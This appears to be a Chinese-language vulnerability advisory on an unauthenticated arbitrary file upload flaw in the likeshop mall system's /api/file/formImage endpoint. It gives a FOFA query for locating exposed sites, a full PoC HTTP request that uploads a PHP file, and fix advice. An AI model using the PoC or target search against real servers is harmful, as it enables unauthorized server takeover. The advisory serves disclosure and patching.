0x01 產品簡介
? ?likeshop單商戶標準商城系統適用于B2C、單商戶、自營商城場景。完美契合私域流量變現閉環交易使用。 系統擁有豐富的營銷玩法,強大的分銷能力,支持電子面單和小程序直播等功能。無論運營還是二開都是性價比極高的100%開源商城系統。
0x02 漏洞概述
? likeshop單商戶標準商城系統/api/file/formImage接口存在任意文件上傳漏洞,由于系統對用戶上傳的文件類型未作任何過濾和限制,未授權的攻擊者可以通過此接口上傳惡意后門文件獲取服務器信息或權限。
0x03 復現環境
FOFA:icon_hash="874152924" && body="/pc/"
0x04 漏洞復現
PoC
POST /api/file/formImage HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye8FPHsIAq9JN8j2A------WebKitFormBoundarye8FPHsIAq9JN8j2A
Content-Disposition: form-data; name="file";filename="1.php"
Content-Type: image/jpeg<?php phpinfo();?>
------WebKitFormBoundarye8FPHsIAq9JN8j2A--
?驗證
0x05?修復建議?
關閉互聯網暴露面,上傳模塊設置白名單限制或過濾
升級至安全版本
?
?
)
-墨者-url信息)
(二))
 C++程序LNK2005錯誤,提示“error LNK2005: _XXX已經在xxx.obj中定義”解決方案)
